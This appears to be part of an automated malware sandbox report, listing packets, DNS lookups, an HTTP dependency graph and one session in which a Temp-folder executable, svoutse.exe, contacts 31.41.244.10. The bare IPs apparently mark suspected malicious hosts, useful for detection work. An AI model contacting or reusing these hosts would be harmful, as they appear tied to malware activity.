Sep 6, 2024 10:01:40.658349991 CEST	53	55754	1.1.1.1	192.168.2.7
Sep 6, 2024 10:02:22.137571096 CEST	54551	443	192.168.2.7	172.64.41.3
Sep 6, 2024 10:02:22.137687922 CEST	54551	443	192.168.2.7	172.64.41.3
Sep 6, 2024 10:02:22.137845993 CEST	54551	443	192.168.2.7	172.64.41.3
Sep 6, 2024 10:02:22.137906075 CEST	54551	443	192.168.2.7	172.64.41.3
Sep 6, 2024 10:02:22.588279009 CEST	443	54551	172.64.41.3	192.168.2.7
Sep 6, 2024 10:02:22.591396093 CEST	54551	443	192.168.2.7	172.64.41.3
Sep 6, 2024 10:02:22.662801027 CEST	54551	443	192.168.2.7	172.64.41.3
Sep 6, 2024 10:02:22.688246012 CEST	443	54551	172.64.41.3	192.168.2.7
Sep 6, 2024 10:02:22.688258886 CEST	443	54551	172.64.41.3	192.168.2.7
Sep 6, 2024 10:02:22.688273907 CEST	443	54551	172.64.41.3	192.168.2.7
Sep 6, 2024 10:02:22.688303947 CEST	443	54551	172.64.41.3	192.168.2.7
Sep 6, 2024 10:02:22.695949078 CEST	54551	443	192.168.2.7	172.64.41.3
Sep 6, 2024 10:02:22.696008921 CEST	54551	443	192.168.2.7	172.64.41.3
Sep 6, 2024 10:02:22.791435003 CEST	443	54551	172.64.41.3	192.168.2.7
Sep 6, 2024 10:02:22.841509104 CEST	54551	443	192.168.2.7	172.64.41.3
Sep 6, 2024 10:02:22.939973116 CEST	443	54551	172.64.41.3	192.168.2.7
Sep 6, 2024 10:02:22.940634012 CEST	443	54551	172.64.41.3	192.168.2.7
Sep 6, 2024 10:02:22.941183090 CEST	443	54551	172.64.41.3	192.168.2.7
Sep 6, 2024 10:02:22.950176001 CEST	54551	443	192.168.2.7	172.64.41.3
Sep 6, 2024 10:02:22.951318979 CEST	63489	443	192.168.2.7	142.251.16.84
Sep 6, 2024 10:02:22.951442957 CEST	63489	443	192.168.2.7	142.251.16.84
Sep 6, 2024 10:02:23.410847902 CEST	443	63489	142.251.16.84	192.168.2.7
Sep 6, 2024 10:02:23.410861969 CEST	443	63489	142.251.16.84	192.168.2.7
Sep 6, 2024 10:02:23.410872936 CEST	443	63489	142.251.16.84	192.168.2.7
Sep 6, 2024 10:02:23.420526981 CEST	63489	443	192.168.2.7	142.251.16.84
Sep 6, 2024 10:02:23.420571089 CEST	63489	443	192.168.2.7	142.251.16.84
Sep 6, 2024 10:02:23.420631886 CEST	63489	443	192.168.2.7	142.251.16.84
Sep 6, 2024 10:02:23.432234049 CEST	443	63489	142.251.16.84	192.168.2.7
Sep 6, 2024 10:02:23.522550106 CEST	443	63489	142.251.16.84	192.168.2.7
Sep 6, 2024 10:02:23.605006933 CEST	63489	443	192.168.2.7	142.251.16.84

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 6, 2024 09:58:16.203917980 CEST	192.168.2.7	1.1.1.1	0xd1c1	Standard query (0)	bzib.nelreports.net	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:16.204142094 CEST	192.168.2.7	1.1.1.1	0x8d9d	Standard query (0)	bzib.nelreports.net	65	IN (0x0001)	false
Sep 6, 2024 09:58:19.422247887 CEST	192.168.2.7	1.1.1.1	0xb2e0	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:19.422389030 CEST	192.168.2.7	1.1.1.1	0x7ddf	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Sep 6, 2024 09:58:19.422728062 CEST	192.168.2.7	1.1.1.1	0xadb2	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:19.422866106 CEST	192.168.2.7	1.1.1.1	0x738b	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Sep 6, 2024 09:58:19.522047997 CEST	192.168.2.7	1.1.1.1	0x93d7	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:19.522270918 CEST	192.168.2.7	1.1.1.1	0x52cf	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Sep 6, 2024 09:58:24.758903027 CEST	192.168.2.7	1.1.1.1	0x9b74	Standard query (0)	prod.classify-client.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:24.770030022 CEST	192.168.2.7	1.1.1.1	0xde1c	Standard query (0)	prod.classify-client.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Sep 6, 2024 09:58:25.331348896 CEST	192.168.2.7	1.1.1.1	0x46bb	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:25.342679977 CEST	192.168.2.7	1.1.1.1	0xc803	Standard query (0)	prod.detectportal.prod.cloudops.mozgcp.net	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:25.358088017 CEST	192.168.2.7	1.1.1.1	0xbee6	Standard query (0)	prod.detectportal.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Sep 6, 2024 09:58:26.492047071 CEST	192.168.2.7	1.1.1.1	0x5a4c	Standard query (0)	example.org	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:26.497471094 CEST	192.168.2.7	1.1.1.1	0x4dfa	Standard query (0)	ipv4only.arpa	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:26.498471022 CEST	192.168.2.7	1.1.1.1	0x6635	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:49.961321115 CEST	192.168.2.7	1.1.1.1	0x8661	Standard query (0)	firefox.settings.services.mozilla.com	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:49.971113920 CEST	192.168.2.7	1.1.1.1	0x7d35	Standard query (0)	prod.remote-settings.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:49.973138094 CEST	192.168.2.7	1.1.1.1	0x88aa	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:49.978657007 CEST	192.168.2.7	1.1.1.1	0x20e5	Standard query (0)	prod.remote-settings.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Sep 6, 2024 09:58:49.981812954 CEST	192.168.2.7	1.1.1.1	0xa16b	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Sep 6, 2024 09:58:50.684922934 CEST	192.168.2.7	1.1.1.1	0x402d	Standard query (0)	services.addons.mozilla.org	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:50.694592953 CEST	192.168.2.7	1.1.1.1	0xa859	Standard query (0)	services.addons.mozilla.org	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:50.702563047 CEST	192.168.2.7	1.1.1.1	0xfcf6	Standard query (0)	services.addons.mozilla.org	28	IN (0x0001)	false
Sep 6, 2024 09:58:50.704821110 CEST	192.168.2.7	1.1.1.1	0x2b53	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:53.622076035 CEST	192.168.2.7	1.1.1.1	0x52e4	Standard query (0)	contile.services.mozilla.com	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:53.644996881 CEST	192.168.2.7	1.1.1.1	0xce1c	Standard query (0)	contile.services.mozilla.com	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:53.660897970 CEST	192.168.2.7	1.1.1.1	0x8c4d	Standard query (0)	contile.services.mozilla.com	28	IN (0x0001)	false
Sep 6, 2024 09:58:53.729526997 CEST	192.168.2.7	1.1.1.1	0xd27c	Standard query (0)	spocs.getpocket.com	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:53.738032103 CEST	192.168.2.7	1.1.1.1	0xd79a	Standard query (0)	prod.ads.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:53.767080069 CEST	192.168.2.7	1.1.1.1	0xa352	Standard query (0)	prod.ads.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Sep 6, 2024 09:58:54.099096060 CEST	192.168.2.7	1.1.1.1	0xe877	Standard query (0)	content-signature-2.cdn.mozilla.net	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:54.107784033 CEST	192.168.2.7	1.1.1.1	0x459	Standard query (0)	prod.content-signature-chains.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:54.115236998 CEST	192.168.2.7	1.1.1.1	0xea17	Standard query (0)	prod.content-signature-chains.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Sep 6, 2024 09:58:54.200851917 CEST	192.168.2.7	1.1.1.1	0x46d	Standard query (0)	shavar.services.mozilla.com	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:54.917732000 CEST	192.168.2.7	1.1.1.1	0xac71	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:54.959681034 CEST	192.168.2.7	1.1.1.1	0xfa73	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:54.982652903 CEST	192.168.2.7	1.1.1.1	0xa416	Standard query (0)	push.services.mozilla.com	28	IN (0x0001)	false
Sep 6, 2024 09:58:57.484963894 CEST	192.168.2.7	1.1.1.1	0x7cf4	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Sep 6, 2024 09:58:57.498914003 CEST	192.168.2.7	1.1.1.1	0x929d	Standard query (0)	telemetry-incoming.r53-2.services.mozilla.com	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:57.506251097 CEST	192.168.2.7	1.1.1.1	0xe082	Standard query (0)	telemetry-incoming.r53-2.services.mozilla.com	28	IN (0x0001)	false
Sep 6, 2024 09:58:58.704669952 CEST	192.168.2.7	1.1.1.1	0x49d1	Standard query (0)	support.mozilla.org	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:58.712394953 CEST	192.168.2.7	1.1.1.1	0xfb78	Standard query (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:58.720915079 CEST	192.168.2.7	1.1.1.1	0x6c84	Standard query (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Sep 6, 2024 09:59:02.093358040 CEST	192.168.2.7	1.1.1.1	0x5b19	Standard query (0)	push.services.mozilla.com	28	IN (0x0001)	false
Sep 6, 2024 09:59:16.080590010 CEST	192.168.2.7	1.1.1.1	0x6135	Standard query (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:59:16.630619049 CEST	192.168.2.7	1.1.1.1	0xf10f	Standard query (0)	push.services.mozilla.com	28	IN (0x0001)	false
Sep 6, 2024 09:59:16.653304100 CEST	192.168.2.7	1.1.1.1	0x9aa1	Standard query (0)	telemetry-incoming.r53-2.services.mozilla.com	28	IN (0x0001)	false
Sep 6, 2024 09:59:37.118536949 CEST	192.168.2.7	1.1.1.1	0xa246	Standard query (0)	push.services.mozilla.com	28	IN (0x0001)	false
Sep 6, 2024 09:59:37.602715015 CEST	192.168.2.7	1.1.1.1	0xc5f9	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Sep 6, 2024 10:00:17.614192963 CEST	192.168.2.7	1.1.1.1	0xbe7e	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Sep 6, 2024 10:00:17.622056961 CEST	192.168.2.7	1.1.1.1	0xab5e	Standard query (0)	push.services.mozilla.com	28	IN (0x0001)	false
Sep 6, 2024 10:00:18.109699965 CEST	192.168.2.7	1.1.1.1	0x38da	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Sep 6, 2024 10:00:22.025535107 CEST	192.168.2.7	1.1.1.1	0x11c	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Sep 6, 2024 10:00:22.025665045 CEST	192.168.2.7	1.1.1.1	0x287f	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Sep 6, 2024 10:01:20.948328018 CEST	192.168.2.7	1.1.1.1	0xfe27	Standard query (0)	telemetry-incoming.r53-2.services.mozilla.com	28	IN (0x0001)	false
Sep 6, 2024 10:01:21.446661949 CEST	192.168.2.7	1.1.1.1	0xa974	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Sep 6, 2024 10:01:40.631166935 CEST	192.168.2.7	1.1.1.1	0xfb61	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Sep 6, 2024 10:01:40.642987013 CEST	192.168.2.7	1.1.1.1	0x57e0	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Sep 6, 2024 10:01:40.650474072 CEST	192.168.2.7	1.1.1.1	0x2947	Standard query (0)	push.services.mozilla.com	28	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 6, 2024 09:58:15.220092058 CEST	1.1.1.1	192.168.2.7	0x8a95	No error (0)	bingadsedgeextension-prod-europe.azurewebsites.net	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 6, 2024 09:58:15.220092058 CEST	1.1.1.1	192.168.2.7	0x8a95	No error (0)	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		94.245.104.56	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:15.220120907 CEST	1.1.1.1	192.168.2.7	0x48ac	No error (0)	bingadsedgeextension-prod-europe.azurewebsites.net	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 6, 2024 09:58:16.211169004 CEST	1.1.1.1	192.168.2.7	0x8d9d	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 6, 2024 09:58:16.211256027 CEST	1.1.1.1	192.168.2.7	0xd1c1	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 6, 2024 09:58:19.429384947 CEST	1.1.1.1	192.168.2.7	0xb2e0	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:19.429384947 CEST	1.1.1.1	192.168.2.7	0xb2e0	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:19.429408073 CEST	1.1.1.1	192.168.2.7	0x738b	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Sep 6, 2024 09:58:19.429425001 CEST	1.1.1.1	192.168.2.7	0x7ddf	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Sep 6, 2024 09:58:19.429882050 CEST	1.1.1.1	192.168.2.7	0xadb2	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:19.429882050 CEST	1.1.1.1	192.168.2.7	0xadb2	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:19.528898001 CEST	1.1.1.1	192.168.2.7	0x93d7	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:19.528898001 CEST	1.1.1.1	192.168.2.7	0x93d7	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:19.529001951 CEST	1.1.1.1	192.168.2.7	0x52cf	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Sep 6, 2024 09:58:24.752197027 CEST	1.1.1.1	192.168.2.7	0xc3e4	No error (0)	prod.classify-client.prod.webservices.mozgcp.net		35.190.72.216	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:24.765659094 CEST	1.1.1.1	192.168.2.7	0x9b74	No error (0)	prod.classify-client.prod.webservices.mozgcp.net		35.190.72.216	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:25.338241100 CEST	1.1.1.1	192.168.2.7	0x46bb	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 6, 2024 09:58:25.338241100 CEST	1.1.1.1	192.168.2.7	0x46bb	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:25.349710941 CEST	1.1.1.1	192.168.2.7	0xc803	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:25.364872932 CEST	1.1.1.1	192.168.2.7	0xbee6	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net			28	IN (0x0001)	false
Sep 6, 2024 09:58:26.498884916 CEST	1.1.1.1	192.168.2.7	0x5a4c	No error (0)	example.org		93.184.215.14	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:26.504214048 CEST	1.1.1.1	192.168.2.7	0x4dfa	No error (0)	ipv4only.arpa		192.0.0.171	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:26.504214048 CEST	1.1.1.1	192.168.2.7	0x4dfa	No error (0)	ipv4only.arpa		192.0.0.170	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:26.505116940 CEST	1.1.1.1	192.168.2.7	0x6635	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 6, 2024 09:58:26.505116940 CEST	1.1.1.1	192.168.2.7	0x6635	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:49.968430996 CEST	1.1.1.1	192.168.2.7	0x8661	No error (0)	firefox.settings.services.mozilla.com	prod.remote-settings.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 6, 2024 09:58:49.968430996 CEST	1.1.1.1	192.168.2.7	0x8661	No error (0)	prod.remote-settings.prod.webservices.mozgcp.net		34.149.100.209	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:49.970472097 CEST	1.1.1.1	192.168.2.7	0xf10f	No error (0)	balrog-aus5.r53-2.services.mozilla.com	prod.balrog.prod.cloudops.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 6, 2024 09:58:49.970472097 CEST	1.1.1.1	192.168.2.7	0xf10f	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:49.978082895 CEST	1.1.1.1	192.168.2.7	0x7d35	No error (0)	prod.remote-settings.prod.webservices.mozgcp.net		34.149.100.209	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:49.981179953 CEST	1.1.1.1	192.168.2.7	0x88aa	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:50.692536116 CEST	1.1.1.1	192.168.2.7	0x402d	No error (0)	services.addons.mozilla.org		52.222.236.48	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:50.692536116 CEST	1.1.1.1	192.168.2.7	0x402d	No error (0)	services.addons.mozilla.org		52.222.236.120	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:50.692536116 CEST	1.1.1.1	192.168.2.7	0x402d	No error (0)	services.addons.mozilla.org		52.222.236.23	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:50.692536116 CEST	1.1.1.1	192.168.2.7	0x402d	No error (0)	services.addons.mozilla.org		52.222.236.80	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:50.701841116 CEST	1.1.1.1	192.168.2.7	0xa859	No error (0)	services.addons.mozilla.org		18.65.39.4	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:50.701841116 CEST	1.1.1.1	192.168.2.7	0xa859	No error (0)	services.addons.mozilla.org		18.65.39.31	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:50.701841116 CEST	1.1.1.1	192.168.2.7	0xa859	No error (0)	services.addons.mozilla.org		18.65.39.112	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:50.701841116 CEST	1.1.1.1	192.168.2.7	0xa859	No error (0)	services.addons.mozilla.org		18.65.39.85	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:50.711426020 CEST	1.1.1.1	192.168.2.7	0x2b53	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 6, 2024 09:58:50.711426020 CEST	1.1.1.1	192.168.2.7	0x2b53	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:51.474817038 CEST	1.1.1.1	192.168.2.7	0x228c	No error (0)	balrog-aus5.r53-2.services.mozilla.com	prod.balrog.prod.cloudops.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 6, 2024 09:58:51.474817038 CEST	1.1.1.1	192.168.2.7	0x228c	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:51.978070974 CEST	1.1.1.1	192.168.2.7	0x3e54	No error (0)	a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com	a17.rackcdn.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 6, 2024 09:58:51.978070974 CEST	1.1.1.1	192.168.2.7	0x3e54	No error (0)	a17.rackcdn.com	a17.rackcdn.com.mdc.edgesuite.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 6, 2024 09:58:53.628808975 CEST	1.1.1.1	192.168.2.7	0x52e4	No error (0)	contile.services.mozilla.com		34.117.188.166	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:53.651870012 CEST	1.1.1.1	192.168.2.7	0xce1c	No error (0)	contile.services.mozilla.com		34.117.188.166	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:53.736598015 CEST	1.1.1.1	192.168.2.7	0xd27c	No error (0)	spocs.getpocket.com	prod.ads.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 6, 2024 09:58:53.736598015 CEST	1.1.1.1	192.168.2.7	0xd27c	No error (0)	prod.ads.prod.webservices.mozgcp.net		34.117.188.166	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:53.745074987 CEST	1.1.1.1	192.168.2.7	0xd79a	No error (0)	prod.ads.prod.webservices.mozgcp.net		34.117.188.166	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:54.105912924 CEST	1.1.1.1	192.168.2.7	0xe877	No error (0)	content-signature-2.cdn.mozilla.net	content-signature-chains.prod.autograph.services.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 6, 2024 09:58:54.105912924 CEST	1.1.1.1	192.168.2.7	0xe877	No error (0)	content-signature-chains.prod.autograph.services.mozaws.net	prod.content-signature-chains.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 6, 2024 09:58:54.105912924 CEST	1.1.1.1	192.168.2.7	0xe877	No error (0)	prod.content-signature-chains.prod.webservices.mozgcp.net		34.160.144.191	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:54.114643097 CEST	1.1.1.1	192.168.2.7	0x459	No error (0)	prod.content-signature-chains.prod.webservices.mozgcp.net		34.160.144.191	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:54.122700930 CEST	1.1.1.1	192.168.2.7	0xea17	No error (0)	prod.content-signature-chains.prod.webservices.mozgcp.net			28	IN (0x0001)	false
Sep 6, 2024 09:58:54.208209991 CEST	1.1.1.1	192.168.2.7	0x46d	No error (0)	shavar.services.mozilla.com	shavar.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 6, 2024 09:58:54.924559116 CEST	1.1.1.1	192.168.2.7	0xac71	No error (0)	push.services.mozilla.com		34.107.243.93	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:54.966888905 CEST	1.1.1.1	192.168.2.7	0xfa73	No error (0)	push.services.mozilla.com		34.107.243.93	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:57.492342949 CEST	1.1.1.1	192.168.2.7	0xeaf	No error (0)	telemetry-incoming.r53-2.services.mozilla.com		34.120.208.123	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:57.505641937 CEST	1.1.1.1	192.168.2.7	0x929d	No error (0)	telemetry-incoming.r53-2.services.mozilla.com		34.120.208.123	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:58.067910910 CEST	1.1.1.1	192.168.2.7	0xed3c	No error (0)	telemetry-incoming.r53-2.services.mozilla.com		34.120.208.123	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:58.711654902 CEST	1.1.1.1	192.168.2.7	0x49d1	No error (0)	support.mozilla.org	prod.sumo.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 6, 2024 09:58:58.711654902 CEST	1.1.1.1	192.168.2.7	0x49d1	No error (0)	prod.sumo.prod.webservices.mozgcp.net	us-west1.prod.sumo.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 6, 2024 09:58:58.711654902 CEST	1.1.1.1	192.168.2.7	0x49d1	No error (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net		34.149.128.2	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:58:58.720340967 CEST	1.1.1.1	192.168.2.7	0xfb78	No error (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net		34.149.128.2	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:59:16.320367098 CEST	1.1.1.1	192.168.2.7	0x6135	No error (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net		34.149.128.2	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:59:16.652409077 CEST	1.1.1.1	192.168.2.7	0x8c9b	No error (0)	telemetry-incoming.r53-2.services.mozilla.com		34.120.208.123	A (IP address)	IN (0x0001)	false
Sep 6, 2024 09:59:37.609417915 CEST	1.1.1.1	192.168.2.7	0xc5f9	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 6, 2024 09:59:37.609417915 CEST	1.1.1.1	192.168.2.7	0xc5f9	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Sep 6, 2024 10:00:17.620980024 CEST	1.1.1.1	192.168.2.7	0xbe7e	No error (0)	push.services.mozilla.com		34.107.243.93	A (IP address)	IN (0x0001)	false
Sep 6, 2024 10:00:18.116705894 CEST	1.1.1.1	192.168.2.7	0x38da	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 6, 2024 10:00:18.116705894 CEST	1.1.1.1	192.168.2.7	0x38da	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Sep 6, 2024 10:00:22.032687902 CEST	1.1.1.1	192.168.2.7	0x11c	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Sep 6, 2024 10:00:22.032687902 CEST	1.1.1.1	192.168.2.7	0x11c	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Sep 6, 2024 10:00:22.032964945 CEST	1.1.1.1	192.168.2.7	0x287f	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Sep 6, 2024 10:01:20.939133883 CEST	1.1.1.1	192.168.2.7	0x9480	No error (0)	telemetry-incoming.r53-2.services.mozilla.com		34.120.208.123	A (IP address)	IN (0x0001)	false
Sep 6, 2024 10:01:21.454761028 CEST	1.1.1.1	192.168.2.7	0xa974	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 6, 2024 10:01:21.454761028 CEST	1.1.1.1	192.168.2.7	0xa974	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Sep 6, 2024 10:01:40.641267061 CEST	1.1.1.1	192.168.2.7	0xfb61	No error (0)	push.services.mozilla.com		34.107.243.93	A (IP address)	IN (0x0001)	false
Sep 6, 2024 10:01:40.649930954 CEST	1.1.1.1	192.168.2.7	0x57e0	No error (0)	push.services.mozilla.com		34.107.243.93	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

slscr.update.microsoft.com

api.edgeoffer.microsoft.com

chrome.cloudflare-dns.com

clients2.googleusercontent.com

https:

accounts.youtube.com

www.google.com

msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com

fs.microsoft.com

edgeassetservice.azureedge.net

31.41.244.10

31.41.244.11

185.215.113.100

detectportal.firefox.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49717	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
